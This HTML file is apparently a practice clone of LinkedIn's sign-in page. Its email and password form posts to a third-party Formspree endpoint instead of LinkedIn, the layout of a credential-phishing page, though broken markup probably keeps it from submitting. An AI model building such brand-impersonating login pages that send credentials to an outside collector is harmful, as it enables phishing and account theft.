<!DOCTYPE html>
<html>
<head>
	
	<meta charset="UTF-8">
  <meta name="description" content="Forms">
  <meta name="keywords" content="Forms">
  <meta name="author" content="Gouri Deshpande">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
	
	<title>  Linkedin Login, Sign Up </title>
	<style>

	*{

		margin: 0px;
	}

	a.too{
		margin-left: 20px;
		font-family: sans-serif;
		text-decoration: none;
		color: grey;
	}

	a.too:hover{
		text-decoration: underline;
	}

	img{
		margin-left: 500px;
	}

	h1{
		font-family: sans-serif;
	}
		div.a{

			
			background-color: white;
			width: 400px;
			height: 350px;
			border-radius: 5px;
			box-shadow: 0px 0px 8px grey;
			margin-left: 500px ;
			padding-left: 25px;
			padding-top: 30px;
		}

		p.rr{
			font-family: sans-serif;
			margin-left: 600px;


		}

		div.b{

		
			margin-left: 250px;
			
		}

		form.uu{
                margin-top: 5px;
		}

		h4{

			color: black;
			font-family: sans-serif;
		}

		select{
			border: 0px;
		}

		button{

			border: 0px;
			background-color: #2867B2;
			border-radius: 20px;
			color: white;
			width: 380px;
	        height: 42px;
	        
	        font-size: 18px;
		}

		button:hover{

			background-color: #004182;
		}

		input{

			border: 1px solid;
			border-radius: 3px;
			width: 370px;
			height: 40px;
			font-size: 20px;
			padding-left: 10px;
		}

		a.ee{
             text-decoration: none ;
             color: #2867B2;
             font-family: sans-serif;
             


		}

		a.ee:hover{
			text-decoration: underline;
			margin-left: 0px;
		}

		b.yy{

			background-color: white;
			border-radius:0px ;

		}

		b.yy:hover{
			background-color: lightblue;
			border-radius:10px ;
		}

		p.oo{
			color: black;
			font-family: sans-serif;
		}

		select{
			margin-left: 20px;
			font-family: sans-serif;
			color: grey;


		}

		select:hover{
			color: #2867B2;
			font-display: block;

		}








	</style>
</head>
<body>

	<a href="#" > <img src="download.png" width="178px" height="107px" > </a> <br> <br>
	 <div class="a"> 
	  <h1> 	Sign In </h1> <br> <p class="oo" >Stay updated on your professional world  </p> <br> 
<form class="uu"
  action="https://formspree.io/f/mleawlda"
  method="POST"
>	  
      <input type="email" name="email" placeholder="Email or Phone number" > <br> <br>
      <input type="password" name="email" placeholder="Password" > </form> <br> 

      <a class="ee" href="#" > <b class="yy" >Forget Password </b>  </a> <br>  <br> <button type="submit" ><b> Sign in </b> </button> </form>

	</div> <br> <br>

	 <p class="rr" > New to Linkedin ?  <b class="yy" > <a class="ee" href="#" > Join Now  </a> </b> </p>   <br> <br> 

	<div class="b"  > <form> <a class="too" href="#" > <b> User agreement </b> </a> 
		<a class="too" href="#" ><b>  Privacy Policies </b> </a>
		 <a class="too" href="#" > <b> Community Guidelines </b> </a> 
		 <a class="too"href="#">  <b> Cookie Policy </b> </a> 
		 <a class="too"href="#" > <b> Copyright Policy </b> </a> 
		 <a class="too"href="#" > <b> Send Feedback </b> </a>

		  <select name="languages" >  
    <option value="Languages"  >  Languages   </option>
    <option value="English"  > English  </option>


	  </select> </form>
	 </div>

	  



</body>
</html>
